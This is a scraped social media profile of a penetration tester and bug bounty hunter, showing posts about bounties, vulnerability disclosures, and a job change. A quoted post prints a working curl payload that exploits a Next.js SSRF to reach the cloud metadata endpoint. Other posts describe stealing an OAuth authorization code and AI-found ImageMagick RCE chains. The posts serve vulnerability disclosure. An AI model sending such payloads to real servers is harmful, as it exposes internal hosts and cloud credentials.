Tobi Weißhaar

219 posts

Tobi Weißhaar banner
Tobi Weißhaar

Tobi Weißhaar

@_kun_19

MSc Advanced Computer Science | Pentester | OSCP | OSWE | CRTO | CRTP| Bug Bounty Hunter #kaeferjaeger

Katılım Nisan 2011
83 Takip Edilen1.3K Takipçiler
Sabitlenmiş Tweet
Tobi Weißhaar
Tobi Weißhaar@_kun_19·
Got a $12,000 bounty on @Hacker0x01! hackerone.com/kun_19 #TogetherWeHitHarder My highest single bounty ever 🙂 And…it was a mobile bug 📱 Unfortunately can‘t share any details, but Android permissions used across multiple apps of the company can be an issue ;)
English
7
7
182
6.2K
Tobi Weißhaar
Tobi Weißhaar@_kun_19·
@rootxharsh @HacktronAI What I observed is that CloudFront, Akamai, etc. are most of the time used and are blocking the suspicious payload
English
0
0
0
98
Harsh Jaiswal
Harsh Jaiswal@rootxharsh·
Last week's Next.js stable release patches multiple vulnerabilities found by @HacktronAI CVE-2026-44578: SSRF via WebSocket upgrade. It is the most impactful of all, it lets an attacker read internal hosts such as cloud metadata endpoints on self-hosted next.js applications. curl -H "Connection: Upgrade" -H "Upgrade: websocket" \ -H "Sec-WebSocket-Version: 13" \ -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \ "http://target:3000" \ --request-target "http://169.254.169.254/latest/meta-data/"
English
6
33
185
16.7K
Tobi Weißhaar retweetledi
pwn.ai
pwn.ai@pwn_ai·
🚨 ZERODAY: ImageMagick 🚨 Our autonomous pentester pwn.ai just dropped multiple zeroday chains in ImageMagick that achieve RCE and File Leak from a single .jpg or .pdf file, bypassing EVERY security policy (Default, Limited, AND Secure). 🤯 💥 Affects Ubuntu, Debian, WordPress & millions of servers globally. Happy Monday and Happy Hunting! 🥰 pwn.ai/blog/imagemagi…
pwn.ai tweet media
English
7
123
469
43.4K
Tobi Weißhaar
Tobi Weißhaar@_kun_19·
Thrilled to announce the start of a new chapter @codewhitesec 🙂 Thank you for the welcome package 🙃
Tobi Weißhaar tweet media
English
5
1
38
1.7K
Tobi Weißhaar retweetledi
Shopify Engineering
Shopify Engineering@ShopifyEng·
🪲 Bug bounty disclosure: account vulnerability Here's how @_kun_19 highlighted a security gap in Shopify Collabs 🧵
Shopify Engineering tweet media
English
2
2
16
2.8K
Tobi Weißhaar
Tobi Weißhaar@_kun_19·
...the configured redirect uri in the Facebook Dev Portal. On this way I showed how I'm able to steal the Oauth authorization code, which also allows me to log into the victim's account
English
0
0
1
258
Tobi Weißhaar
Tobi Weißhaar@_kun_19·
...I created an own Facebook OAuth Client in Facebook's Developer Portal and started the activity with the appropriate OAuth config. The victim is now prompted to log in via Facebook and after doing that, the OAuth victim's authorization code is sent to my web server due to...
English
1
0
2
278
Tobi Weißhaar
Tobi Weißhaar@_kun_19·
And now it‘s weekend 😫
Tobi Weißhaar tweet media
English
0
0
47
1.9K